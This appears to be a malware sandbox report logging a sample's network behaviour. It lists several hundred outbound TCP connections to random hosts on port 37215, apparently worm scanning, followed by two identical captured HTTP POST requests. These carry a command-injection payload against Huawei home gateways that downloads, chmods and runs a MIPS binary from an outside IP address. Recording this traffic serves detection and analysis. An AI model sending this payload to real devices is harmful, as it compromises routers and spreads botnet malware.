Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.3.247.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.1.144.7:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.91.56.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.97.208.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.184.154.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.238.122.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.117.173.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.65.82.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.195.75.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.48.161.183:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.21.36.62:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.10.191.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.155.111.103:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.176.75.196:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.166.167.76:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.66.14.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.250.182.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.185.10.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.121.107.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.184.40.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.106.255.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.85.164.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.19.95.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.214.212.29:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.147.162.15:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.31.233.119:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.74.36.15:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.40.51.87:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.32.32.56:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.199.242.100:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.244.119.10:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.69.137.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.53.183.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.138.221.51:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.213.27.205:37215
Source: global traffic	TCP traffic: 192.168.2.13:54632 -> 87.246.7.66:35342
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.57.99.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.92.249.154:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.84.119.18:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.46.38.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.226.26.51:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.121.76.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.27.70.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.14.137.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.150.144.9:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.113.22.164:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.133.122.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.50.96.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.219.164.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.201.142.40:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.185.88.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.55.183.104:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.229.29.66:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.24.130.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.101.36.47:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.88.193.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.235.191.57:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.183.122.251:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.158.71.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.165.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.96.80.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.208.74.157:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.195.138.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.245.217.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.171.200:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.168.129.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.166.178.8:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.18.120.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.2.182.245:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.185.27.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.96.204.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.147.29.107:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.16.43.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.15.233.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.78.57.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.231.237.250:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.89.54.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.89.19.10:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.184.144.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.185.141.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.113.245.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.165.138.31:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.67.137.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.147.201.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.129.249.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.93.112.100:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.168.133.48:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.237.56.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.45.10.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.103.244.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.156.215.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.174.239.168:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.183.72.29:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.25.232.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.81.217.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.177.128.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.3.156.212:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.199.191.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.78.235.223:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.4.98.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.88.202.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.184.177.28:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.72.223.61:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.91.91.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.47.139.24:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.12.174.117:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.181.120.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.168.248.103:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.114.129.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.105.18.77:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.119.171.152:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.224.227.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.4.79.141:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.79.241.51:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.81.60.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.28.160.49:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.51.104.129:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.14.72.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.114.247.62:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.216.225.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.169.139.178:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.117.56.170:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.145.248.63:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.8.35.208:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.161.48.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.37.235.129:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.163.176.49:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.183.12.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.134.65.247:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.36.181.234:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.66.7.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.246.92.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.181.25.65:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.107.132.131:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.51.137.254:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.142.143.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.184.182.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.95.18.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.23.28.63:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.105.100.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.92.177.77:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.190.95.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.101.8.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.25.101.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.132.79.141:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.73.198.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.203.111.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.167.15.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.231.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.164.165.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.20.123.107:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.64.32.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.35.50.222:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.87.140.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.36.110.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.4.27.76:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.76.53.104:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.174.189.200:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.16.116.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.114.219.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.17.45.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.23.204.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.143.128.87:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.44.2.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.155.79.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.85.98.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.43.184.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.13.13.48:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.186.221.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.138.16.170:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.57.217.229:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.139.148.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.98.200.228:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.234.69.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.63.133.65:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.42.31.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.150.245.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.132.199.139:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.47.80.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.126.108.255:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.192.229.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.215.147.238:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.37.54.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.230.216.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.147.169.183:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.207.181.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.161.26.250:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.35.127.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.46.231.76:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.135.103.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.137.79.159:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.230.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.176.239.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.11.107.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.166.185.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.208.120.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.46.93.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.190.234.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.199.124.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.87.178.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.159.19.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.12.13.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.86.208.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.93.174.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.81.99.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.239.95.11:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.236.212.172:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.245.102.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.205.214.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.147.33.94:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.170.32.236:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.16.13.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.128.186.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.113.246.146:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.204.196.180:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.218.97.224:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.18.174.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.254.34.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.190.65.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.75.152.190:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.43.151.45:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.56.5.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.31.175.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.142.51.149:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.135.192.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.3.125.240:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.67.194.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.130.178.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.145.184.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.82.228.39:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.173.81.174:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.33.101.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.225.31.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.231.83.107:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.8.115.191:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.214.90.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.46.138.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.215.1.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.200.156.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.217.62.141:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.17.125.173:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.86.58.247:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.228.123.228:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.42.253.238:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.243.44.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.103.131.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.187.64.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.25.5.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.191.251.139:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.216.7.179:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.94.98.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.191.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.229.37.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.120.137.211:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.185.6.41:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.248.119.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.63.205.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.40.88.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.202.207.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.196.28.223:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.168.252.255:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.231.146:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.119.97.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.124.89.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.39.92:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.83.169.154:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.210.47.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.89.244.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.149.161.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.45.159.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.162.199.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.174.182.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.143.196.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.126.27.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.199.155:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.50.108.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.44.33.245:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.16.175.11:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.24.147.26:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
